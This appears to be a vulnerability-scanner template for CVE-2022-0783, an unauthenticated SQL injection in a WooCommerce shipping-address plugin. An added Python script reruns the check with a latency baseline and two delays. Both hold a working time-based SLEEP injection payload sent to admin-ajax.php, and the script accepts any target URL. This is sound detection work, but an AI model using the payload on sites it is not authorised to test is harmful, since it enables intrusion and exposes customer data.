The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
PoC code [publicly available]
id: CVE-2022-0783

info:
  name: Multiple Shipping Address Woocommerce < 2.0 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The Multiple Shipping Address Woocommerce plugin before 2.0 does not properly sanitize and escape numerous parameters before using them in SQL statements via some AJAX actions available to unauthenticated users, leading to unauthenticated SQL injections.
  impact: |
    Unauthenticated attackers can execute time-based blind SQL injection to extract database contents, potentially exposing sensitive WooCommerce customer and order data.
  remediation: |
    Update the Multiple Shipping Address Woocommerce plugin to version 2.0 or later.
  reference:
    - https://wpscan.com/vulnerability/4d594424-8048-482d-b61c-45be1e97a8ba/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0783
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0783
    cwe-id: CWE-89
    epss-score: 0.51271
    epss-percentile: 0.97789
    cpe: cpe:2.3:a:themehigh:multiple_shipping_addresses_for_woocommerce:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    verified: true
    vendor: themehigh
    product: multiple_shipping_addresses_for_woocommerce
    fofa-query: body="wp-content/plugins/multiple-shipping-address-woocommerce"
  tags: cve,cve2022,wordpress,wp,wp-plugin,multiple-shipping-address-woocommerce,sqli,vuln

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=ocwma_choice_address&sid=3+AND+(SELECT+1946+FROM+(SELECT(SLEEP(7)))zsme)

    matchers:
      - type: dsl
        dsl:
          - "duration>=7"
          - "len(body) == 5"
          - "status_code==200"
          - "regex('false$', body)"
        condition: and
# digest: 4a0a00473045022100d32f9687ad1fa450ab01a4c2ff9089af489a8c322fb2532c0d7825c8b04336fa02202b1734294339c22e7d57510d67f290457779b5e86236e630154e339a248184c4:922c64590222798bb761d5b6d8e72950
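The template above fires on a single request whose duration reaches 7 seconds, which is exactly what a slow or overloaded host produces on its own. The script below is an added example (not part of the template, the nuclei project, or the plugin) that sends the same POST to /wp-admin/admin-ajax.php with the same action and payload shape, but first measures a baseline request with a plain sid, then probes with two different SLEEP values and only reports the injection when the extra latency tracks each requested delay. The `send` callable, the `make_simulated_sender` stub and the 0.8 tolerance factor are assumptions made for this example; the stub is a constructed stand-in so the check can be exercised offline.

```python
"""Time-based blind SQLi check for CVE-2022-0783 with a latency baseline.

Added example, not the nuclei template's own code. Request shape follows the
template: POST /wp-admin/admin-ajax.php, action=ocwma_choice_address, sid=<payload>.
"""
import re
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Tuple

# A sender takes the URL-encoded POST body and returns (status_code, body_text).
Sender = Callable[[str], Tuple[int, str]]

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "ocwma_choice_address"  # AJAX action used by the template


def build_body(sid: str) -> str:
    """URL-encode the POST body the same way the template does (action + sid)."""
    return urllib.parse.urlencode({"action": ACTION, "sid": sid})


def sleep_payload(seconds: int, base_sid: str = "3") -> str:
    """Same payload shape as the template: <sid> AND (SELECT 1946 FROM (SELECT(SLEEP(n)))zsme)."""
    return f"{base_sid} AND (SELECT 1946 FROM (SELECT(SLEEP({seconds})))zsme)"


def make_http_sender(base_url: str, timeout: float = 30.0) -> Sender:
    """Real transport (assumed helper): POST to <base_url>/wp-admin/admin-ajax.php."""
    url = base_url.rstrip("/") + AJAX_PATH

    def send(body: str) -> Tuple[int, str]:
        req = urllib.request.Request(
            url, data=body.encode(), method="POST",
            headers={"Content-Type": "application/x-www-form-urlencoded"})
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as e:  # non-2xx still has a body worth keeping
            return e.code, e.read().decode("utf-8", "replace")
    return send


def make_simulated_sender(vulnerable: bool) -> Sender:
    """Constructed stand-in for a WordPress host (not real plugin behaviour):
    it answers "false" like the template's matcher expects and, when marked
    vulnerable, honours SLEEP(n) found in sid by actually sleeping n seconds."""
    def send(body: str) -> Tuple[int, str]:
        sid = dict(urllib.parse.parse_qsl(body)).get("sid", "")
        m = re.search(r"SLEEP\((\d+)\)", sid)
        if vulnerable and m:
            time.sleep(int(m.group(1)))
        return 200, "false"
    return send


def timed(send: Sender, body: str) -> Tuple[float, int, str]:
    """Return (elapsed_seconds, status, body) for one request."""
    t0 = time.monotonic()
    status, text = send(body)
    return time.monotonic() - t0, status, text


def check_time_based_sqli(send: Sender, delays: Tuple[int, ...] = (7, 3),
                          base_sid: str = "3", tolerance: float = 0.8) -> Dict[str, object]:
    """Baseline first, then one probe per delay; vulnerable only if every probe's
    extra latency over baseline reaches tolerance * requested delay with HTTP 200."""
    base_t, base_status, base_body = timed(send, build_body(base_sid))
    probes = []
    for d in delays:
        inj_t, inj_status, inj_body = timed(send, build_body(sleep_payload(d, base_sid)))
        probes.append({
            "delay": d,
            "seconds": round(inj_t, 3),
            "extra": round(inj_t - base_t, 3),
            "status": inj_status,
            # A pure time-based injection changes latency only, so a differing
            # body is worth a look but is not used to decide.
            "same_response": (inj_status, inj_body) == (base_status, base_body),
        })
    vulnerable = all(p["status"] == 200 and p["extra"] >= p["delay"] * tolerance
                     for p in probes)
    return {"baseline_seconds": round(base_t, 3), "probes": probes, "vulnerable": vulnerable}


if __name__ == "__main__":
    # Usage: python check.py https://target.example  (hypothetical host)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    sender = make_http_sender(target) if target else make_simulated_sender(True)
    print(check_time_based_sqli(sender, delays=(7, 3) if target else (1,)))
```

Using two distinct delays makes the result self-confirming: a host that is simply slow adds roughly the same latency to every request, whereas a SLEEP-driven delay scales with the value sent. The template's extra matchers (status 200, a 5-byte body ending in `false`) can be layered on top by inspecting each probe's status and the `same_response` flag.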